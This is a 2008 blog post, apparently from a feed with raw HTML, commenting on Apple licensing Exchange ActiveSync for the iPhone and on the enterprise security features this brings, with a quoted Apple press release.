greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. iPhone and Exchange to play nicely together - and security will be greatly improved http://www.greghughes.net/rant/PermaLink,guid,af212632-177f-491c-a08e-d75626c70435.aspx http://www.greghughes.net/rant/iPhoneAndExchangeToPlayNicelyTogetherAndSecurityWillBeGreatlyImproved.aspx Fri, 07 Mar 2008 01:00:07 GMT <p> <a href="http://www.microsoft.com/Presspass/Features/2008/mar08/03-06EASqa.mspx" target="_blank">Microsoft</a> and <a href="http://www.apple.com/pr/library/2008/03/06iphone.html" target="_blank">Apple have announced</a> that they are working together to&nbsp; make Exchange Server and the iPhone mobile phone work well together. Apple will license Exchange ActiveSync for use on the iPhone, which will in Turn help assure the Exchange Server dominance in the marketplace stays they way it is. It's really as simple as that. </p> <p> The fact is that Exchange is a pretty terrific server product for email, calendaring and a lot more. The iPhone is a pretty terrific mobile device. They don't integrate too terribly well today: You can sync your calendar and contacts via the USB connection to your computer, and you can get IMAP email from a properly-configured Exchange server (which works, but is not exactly optimal). But it's far from simple, far from seamless, and far from supportable in the enterprise. </p> <p> One has to wonder what this means, either directly or indirectly, for the Windows Mobile world. I know the arguments: Different markets, different platforms, different purposes, etc. etc. etc... but with the iPhone SDK availability, that gap will be much narrower. And the fact of the matter is, Apple has the usability nailed with the iPhone. Sure, there's a few enhancements needed. But those are ones that can (and I'm certain will) be done. </p> <p> ActiveSync will provide the ability (assuming Apple leverages all the features) to do push email, calendar and contact sync over the air, and task list sync. </p> <p> Perhaps one of the more important potential benefits from ActiveSync integration with the iPhone is the ability to get enterprise-class security on the device, <a href="http://www.greghughes.net/rant/ThinkingAboutUsingIPhonesAtYourCompanyThinkAgainIfYouCareAboutSecurity.aspx" target="_blank">which to date is lacking</a> and doesn't meet the needs or standards of most commercial IT departments. Exchange 2007 clients can be set up for <a href="http://msexchangeteam.com/archive/2007/11/19/447551.aspx" target="_blank">enforced enterprise IT "policies"</a> or controls, which would go a long way toward satisfying the security needs. In my mind, that's the biggest potential win. Without that, pushing email and syncing calendars and contacts is to risky an activity. </p> <p> From Apple's press release come details of what they intend to provide - and it looks liek Cisco VPNs are in the package, as well: </p> <blockquote> <p> <em>Apple has licensed Exchange ActiveSync from Microsoft and is building it right into the iPhone, so that iPhone will connect out-of-the-box to Microsoft Exchange Servers 2003 and 2007 for secure over-the-air push email, contacts, calendars and global address lists. Built-in Exchange ActiveSync support also enables security features such as remote wipe, password policies and auto-discovery. The iPhone 2.0 software supports Cisco IPsec VPN to ensure the highest level of IP-based encryption available for transmission of sensitive corporate data, as well as the ability to authenticate using digital certificates or password-based, multi-factor authentication. The addition of WPA2 Enterprise with 802.1x authentication enables enterprise customers to deploy iPhone and iPod touch with the latest standards for protection of Wi-Fi networks. </em> <p> <em>The iPhone 2.0 software provides a configuration utility that allows IT administrators to easily and quickly set up many iPhones, including password policies, VPN setting, installing certificates, email server settings and more. Once the configuration is defined it can be easily and securely delivered via web link or email to the user. To install, all the user has to do is authenticate with a user ID or password, download the configuration and tap install. Once installed, the user will have access to all their corporate IT services.</em> </p> </blockquote> <p> Good move Apple. Good move Microsoft. Looking forward to this one! </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,af212632-177f-491c-a08e-d75626c70435.aspx IT Security Mobile Tech